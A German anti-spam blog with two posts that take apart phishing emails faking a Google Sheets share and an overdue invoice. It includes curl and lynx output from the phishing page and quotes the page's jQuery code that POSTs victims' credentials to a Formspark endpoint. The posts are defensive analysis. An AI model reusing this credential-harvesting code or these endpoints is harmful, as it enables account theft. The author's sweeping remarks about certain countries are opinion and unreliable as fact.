Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Formspark“

Spreadsheet shared with you… Invoice

Donnerstag, 9. Oktober 2025

Häh? 🤔️

Von: Google Sheets <cassie@lifangvision.com>

Dies ist einer der wenigen Fälle, in denen sogar eine GMail-Adresse als Absender irgendwie glaubwürdiger gewesen wäre. Natürlich verwendet Google stets Mailadressen aus den eigenen Domains. 😁️

account@tamagothi.de shared a spreadsheet

  1. Diese Mailadresse existiert nicht in der Domain tamagothi.de. Die Mailadressen dort richte ich immer noch selbst ein.
  2. Die Domain tamagothi.de wird nicht von Google verwaltet.
  3. Wenn man mir eine Datei zumailen will, kann man sie einfach an die E-Mail anhängen, so wie das seit ungefähr den Achtziger Jahren [!] möglich ist und in den Neunziger Jahren standardisiert und auch immer gern genutzt wurde, weil das nun einmal die direkteste und einfachste Methode ist. Irgendwelche komplizierten Umwege mit Filehostern und Links in einer Mail sind nur erforderlich, wenn die Datei sehr groß ist. Ab der Größenordnung MiB sollte man besser davon absehen, daraus einen Mailanhang zu machen. Rechnungen, Briefe und sogar wissenschaftliche Fachartikel (mit allem Gedöns an eingebetteten Grafiken und schönem Satz in guter Schriftart) sind kleiner, hochauflösende Fotos meist größer.

tamagothi.de (account@tamagothi.de) added you as an editor. Verify your email to securely make edits to this spreadsheet. You will need to verify your email every 7 days. Learn more

Dubai Invoice 10/9/2025 6:19:41 AM

Open

Der Link führt natürlich auch nicht zu Google, sondern in eine Domain, die über das zurzeit von Spammern meistmissbrauchte kostenlose Angebot von Cloudflare läuft. An die URI ist noch einmal die Mailadresse angehängt, damit die Spammer auch wissen, unter welchen Mailadressen die Spam ankommt, gelesen wird und sogar beklickt wird, denn das sind gute Opfer für jede denkbare kriminelle Machenschaft. Dort gibt es ein lustiges HTML-Dokument…

$ curl -s "https://safer-guests-advisory-flat.trycloudflare.com/?#leck@meinen.arsch" >dubai-invoice
$ file dubai-invoice 
dubai-invoice: HTML document, ASCII text
$ mv dubai-invoice dubai-invoice.html
$ lynx -dump dubai-invoice.html 
   Your session has expired, please sign in to continue.
   ____________________
   Please enter a valid email address.
   ____________________
   Please enter your password.
   (BUTTON) Sign In
$ _

…in welchem man seine Mailadresse (wird in Javascript mit der angegebenen Mailadresse vorbelegt) und sein Passwort eingeben und an Kriminelle senden kann. Natürlich haben die Kriminellen hierfür auch ein kostenloses Angebot eines Unternehmens verwendet, in diesem Fall ist es Formspark:

$ sed -n 134,147p dubai-invoice.html
            $.ajax({
                url:'https://submit-form.com/61dmNNQ8B',
                method: 'POST',
                data: {
                    chat_id: chatId,
                    text: message
                },
                success: function(response) {
                    window.location.href = `https://${domain}`;
                },
                error: function(error) {
                    $('#errorMessage').text('Error in submitting form!').show();
                }
            });
$ _

Ich bin übrigens erstaunt, dass dieser Phisher nicht einmal versucht hat, die Zieldomain im Quelltext in kryptischem Coding zu verbergen. Vermutlich ist der Honk, dessen geistiges Herausgefordertsein auch im Text der Spam durchschimmerte, mit solchen Dingen ein bisschen überfordert. Oder er fühlt sich sehr sicher, weil er in einem Staat lebt, in dem nicht so viel Wert auf Ermittlungen in Sachen Computerkriminalität gelegt wird oder in dem Verwaltung, Justiz und Polizeien durch und durch korrupt sind. Besonders sorglos waren früher stets die Phisher und Betrüger aus Nigeria, Russland und der Ukraine, später kam auch das bettelarme Benin hinzu.

Warum der Phisher dann nicht einfach ein HTML-Formular mit POST-Methode und Angabe der Adresse als action-Parameter im FORM-Tag macht? Vermutlich weiß der spammende Idiot gar nicht mehr, dass man so etwas auch in HTML machen kann, und zwar einfacher, kürzer, barrierefreier und klarer. So, wie etwa hier auf Unser täglich Spam das Kommentarformular, weil ich so viel Funktion wie möglich auch für Leser haben möchte, die Wert auf Computersicherheit und Privatsphäre legen (oder legen müssen) und deshalb einen Skriptblocker benutzen – Javascript verwende ich in einer Website extrem ungern und nur für Funktionen, die hübsch sind, aber nicht unbedingt sein müssen. 🤭️

Oder aber der spammende Idiot hat sich seine Phishingseite bei einem angelernten neuronalen Netzwerk – von Politikern, Journalisten und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir auch alle weniger Deutsch und mehr Reklame sprechen und denken – erpromptet. Denn wenn sich ein Spammer Mühe geben wollte, brauchte er ja auch nicht zu spammen, sondern könnte gleich arbeiten gehen. Dabei kommt auch ziemlich oft Code aus Lehrbüchern wieder raus, der vom Autor nur didaktisch-illustrativ gemeint war, den aber in der Praxis kein denkender Mensch so schreiben würde, wenn es auch eine ganze Größenordnung weniger komplex geht. Diese angelernten neuronalen Netzwerke haben zwar das Wissen der Welt beim Training mit dem Nürnberger Trichter verabreicht bekommen, aber sie verstehen davon nichts. Gut, dass ich bald tot bin. Nicht, dass mich noch jemand mit neuerdings wieder modernwerdenden Zwangsarbeitsgesetzen dazu heranzieht, den ganzen durch Vibe Coding entstandenen Müll zu entfehlern, zu erweitern oder zu verbessern! Ich habe ehrlich gesagt ein Vierteljahrhundert später immer noch genug vom Jahr-2000-Bug… und da habe ich viel Code von Menschen gelesen, deren Gedanken und Gedankenlosigkeiten noch halbwegs nachvollziehbar formuliert waren, und nicht das stochastisch generierte Geschwall aus angelernten neuronalen Netzwerken. Den Nach-mir-Kommenden wünsche ich viel Glück, sie werden es brauchen! 🫤️

Use is subject to the Google Privacy Policy.

Ganz sicher nicht. 🤥️

Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Mein Exemplar dieser Spam wurde über eine IP-Adresse aus dem großen, weiten Russland versendet und hat auf ihrem gesamten Transportweg niemals die USA gesehen.

You have received this email because account@tamagothi.de shared a spreadsheet with you from Google Sheets. Delete visitor session

Dass das eine Lüge ist, sollte jetzt hoffentlich klar genug geworden sein.

Google Workspace

Google, von mir so viel geschmäht, hat damit mal überhaupt nichts zu tun. An keiner Stelle.

Nicht reinklicken, einfach löschen! 🗑️

Generell niemals in eine E-Mail klicken!

SSB Automatic Invoice

Samstag, 20. September 2025

Ja, ich merke es schon: Das ist eine sehr „automatische“ Rechnung. Sie kommt auch völlig grundlos bei mir an.

Logo

Ich habe auch ein Logo.

Dear nachtwaechter,

Immerhin besser als „Guten Tag“, aber trotzdem nicht der richtige Name. Gar nicht auszudenken, wie das klingt, wenn jemand „schnupsimaus69 at irgendwas“ heißt. 😁️

This is a billing notice that your invoice INV–2147483648 generated on nachtwaechter is now overdue.

Oh, toll: Mit Nummer. Muss wichtig sein, sonst hätte es ja keine Nummer. Hier, Spammer, wenn euch die Nummern mal ausgehen sollten, ich habe noch ein paar für euch:

$ dd if=/dev/urandom bs=64 count=1 | od -l | sed 's/^[0-9]*[ -]*//' | tr – ' '
1+0 Datensätze ein
1+0 Datensätze aus
64 Bytes kopiert, 2,8494e-05 s, 2,2 MB/s
9104019511127040432  3556446584735863681
6517096418393505982  8953164502467161676
3433427370092636688  7981156417554269279
8046936970601088068  8050893807030589722
$ _

So können eure Spams immer so richtig irre wichtig aussehen. Da vergisst man sogar die mögliche Anrede als Schnupsimaus 69, wenn man so wichtige Nummern sieht. 😁️

Pay now to avoid service cancellation.

Invoice: INV–2147483648

Due Date: 9/19/2025 6:28:32 AM

Oh, wie geil. Eine sekundengenaue Fristsetzung hatte ich auch noch nie. Darüber übersehe ich sogar, dass das US-amerikanische Datumsformat für gestern – die Mail ist übrigens heute angekommen – hier ein kleines bisschen unüblich ist. Aber wofür bezahle ich da eigentlich, und welche Dienstleistung wird storniert? Ich weiß ja nicht einmal, wer mir hier angeblich schreibt. Moment, ich schaue mal in den HTML-Quelltext, da sollte ja oben noch ein Logo nachgeladen werden, das schafft bestimmt Klarheit:

<img style="padding: 20px; max-width: 64px;" alt=" Logo" src="https://www.google.com/s2/favicons?sz=64&amp;domain=tamagothi.de" width="64" height="64">

Oh krass, das ist das Piktogramm meiner eigenen Homepage! Gut, dass Google immer so vielfältig nutzbar ist und dass Google jeder Missbrauch durch Kriminelle seit mindestens anderthalb Jahrzehnten völlig wumpe ist. Zuverlässigkeit und vielseitige persönliche Nutzbarkeit ist eben das Wichtigste im gegenseitigen Umgang zwischen asozialen Unternehmen wie Google und Trickbetrügern. 😅️

(Ja, werter Mitmensch Jurist, ich habe „asozial“ geschrieben. Es ist meine Bezeichnung für Geschäftsmodelle, die darauf basieren, dass ein börsennotiertes Unternehmen Reibach mit kostenlosen Dienstleistungen macht, aber die anfallenden Aufwände und Kosten durch den Missbrauch dieser Dienstleistungen der gesamten restlichen Menschheit aufbürdet. Google ist selbst Spam. Verantwortungslos und geradezu kriminell geschäftstüchtig. Schon sehr, sehr lange. Google stinkt.)

Wer eine sicher konfigurierte Mailsoftware verwendet, die nicht einfach Bilder aus dem Web nachlädt, kann nicht so leicht mit billigen Tricks in die Irre geführt werden. Wer aber seine technische Bildung aus „Mein Auto spricht zu mir“ Knight Rider bezogen hat, wird von „meine Website mailt mich an“ auch nicht weiter überrascht sein. 😆️

You can log in to your client area to view and pay the invoice at:
https://www.tamagothi.de/viewinvoice.php?id=INV–2147483648

Natürlich ist der Link irreführend. Er geht nicht in die Domain tamagothi.de, das ist nur der Linktext. In Wirklichkeit geht es in eine Subdomain von trycloudflare.com Das kostet den Phisher ja auch nichts. Dort bekommt man die Möglichkeit…

Your session has expired, please sign in to continue

…etwas sehr dummes zu tun und auf einer ansonsten völlig nackten Webseite ohne Impressum sein Passwort einzugeben. Dieses geht direkt an Kriminelle. Mit einem Zugriff auf die E-Mail kann man bei den meisten Menschen schon viel anfangen. Man kann Konten bei Amazon oder eBay übernehmen und für Betrugsgeschäfte unter fremder Identität nutzen, man kann aber auch personalisierte Betrugsnummern machen – nicht vergessen: der gesamte bisherige Mailverkehr steht den Betrügern zur Verfügung, und der gibt tiefe Einblicke – und Freunde, Bekannte, Verwandte anschreiben, eine Notlage vorspielen und um Geld bitten, am besten über Western Union, das geht ja am schnellsten.

Wenn man sich angemeldet hat, gibt es eine plumpe Fehlermeldung. Die Daten sind aber schon bei den Trickbetrügern. Um die Daten zu erhalten, verwenden sie die Dienstleistung von Formspark, wo man sich unter Angabe seiner Mailadresse ebenfalls einen kostenlosen Account einrichten kann.

Thank you for using our services,
Visit our website | Log in to your account | Get support

Copyright © All rights reserved.

Vielen Dank, dass ihr Spammer mir so gern den Arsch sauberleckt! 👍️
Klick mal hier | Klick mal dort | Hauptsache, du klickst, denn alle Links führen auf die gleiche Phishing-Seite

Die Unternehmung mit der Firmierung „Alle Rechte vorbehalten“ proklamiert ein grundloses und immerwährendes geistiges Eigentum auf diesen Blogeintrag eines Spamgenießers.

Entf! 🚽️